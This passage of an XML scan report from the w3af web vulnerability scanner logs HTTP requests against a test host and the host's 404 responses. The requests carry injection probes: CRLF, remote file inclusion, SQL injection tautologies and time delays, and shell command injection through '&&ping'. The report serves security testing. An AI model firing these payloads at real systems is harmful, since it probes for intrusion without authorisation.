        The article about w3af%0Avulnerable073b%3A+ae5cw3af has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='w3af%0Avulnerable073b%3A+ae5cw3af'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="529">
                <http-request>
                    <status>GET http://10.12.68.43:31337/w3af%0Dvulnerable073b%3A+ae5cw3af HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about w3af%0Dvulnerable073b%3A+ae5cw3af has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='w3af%0Dvulnerable073b%3A+ae5cw3af'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="534">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%22 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %22 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%22'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="535">
                <http-request>
                    <status>GET http://10.12.68.43:31337/http%3A%2F%2Fw3af.org%2Frfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="565" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A%2F%2Fw3af.org%2Frfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="537">
                <http-request>
                    <status>GET http://10.12.68.43:31337/w3af.org/rfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/w3af.org/rfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="538">
                <http-request>
                    <status>GET http://10.12.68.43:31337/http%3A/w3af.org/rfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A//w3af.org/rfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="539">
                <http-request>
                    <status>GET http://10.12.68.43:31337/iDontExist HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about iDontExist has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='iDontExist'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="540">
                <http-request>
                    <status>GET http://10.12.68.43:31337/w3af.org%2Frfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="552" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/w3af.org%2Frfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="544">
                <http-request>
                    <status>GET http://10.12.68.43:31337/hTtP%3A%2F%2Fw3af.org%2Frfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="565" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtP%3A%2F%2Fw3af.org%2Frfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="545">
                <http-request>
                    <status>GET http://10.12.68.43:31337/hTtP%3A/w3af.org/rfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtP%3A//w3af.org/rfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="546">
                <http-request>
                    <status>GET http://10.12.68.43:31337/19%27+AND+%2719%27%3D%2720 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 19%27+AND+%2719%27%3D%2720 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='19%27+AND+%2719%27%3D%2720'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="550">
                <http-request>
                    <status>GET http://10.12.68.43:31337/Thread.Sleep%283000%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="558" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/Thread.Sleep%283000%29%3B&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="560">
                <http-request>
                    <status>GET http://10.12.68.43:31337/45+OR+45%3D45+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 45+OR+45%3D45+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='45+OR+45%3D45+'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="569">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %2Fusr%2Fsbin%2Fping+-s+localhost+4 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%2Fusr%2Fsbin%2Fping+-s+localhost+4'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="573">
                <http-request>
                    <status>GET http://10.12.68.43:31337/45+AND+45%3D46+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 45+AND+45%3D46+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='45+AND+45%3D46+'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="596">
                <http-request>
                    <status>GET http://10.12.68.43:31337/26+OR+26%3D26+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 26+OR+26%3D26+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='26+OR+26%3D26+'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="606">
                <http-request>
                    <status>GET http://10.12.68.43:31337/26+AND+26%3D27+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 26+AND+26%3D27+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='26+AND+26%3D27+'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="612">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%26%26ping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %26%26ping+-n+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%26%26ping+-n+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="653">
                <http-request>
                    <status>GET http://10.12.68.43:31337/SW4Xs4RI HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about SW4Xs4RI has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='SW4Xs4RI'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="654">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%3Bwaitfor+delay+%270%3A0%3A3%27-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%3Bwaitfor+delay+%270%3A0%3A3%27--'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="657">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%26%26ping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %26%26ping+-c+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%26%26ping+-c+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="673">
                <http-request>
                    <status>GET http://10.12.68.43:31337/vGzzZCkG HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about vGzzZCkG has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='vGzzZCkG'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="675">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ewcwn%3C%2F-%3Eewcwn%2F%2Aewcwn%22ewcwnewcwn%27ewcwnewcwn%60ewcwnewcwn+%3D HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about ewcwn%3C%2F-%3Eewcwn%2F%2Aewcwn%22ewcwnewcwn%27ewcwnewcwn%60ewcwnewcwn+%3D has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='ewcwn%3C%2F-%3Eewcwn%2F%2Aewcwn%22ewcwnewcwn%27ewcwnewcwn%60ewcwnewcwn+%3D'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="680">
                <http-request>
                    <status>GET http://10.12.68.43:31337/7%22+OR+%227%22%3D%227 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 7%22+OR+%227%22%3D%227 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='7%22+OR+%227%22%3D%227'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="693">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%29%3Bwaitfor+delay+%270%3A0%3A3%27-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%29%3Bwaitfor+delay+%270%3A0%3A3%27--'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="696">
                <http-request>
                    <status>GET http://10.12.68.43:31337/7%22+AND+%227%22%3D%228 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 7%22+AND+%227%22%3D%228 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='7%22+AND+%227%22%3D%228'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="701">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%26%26%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
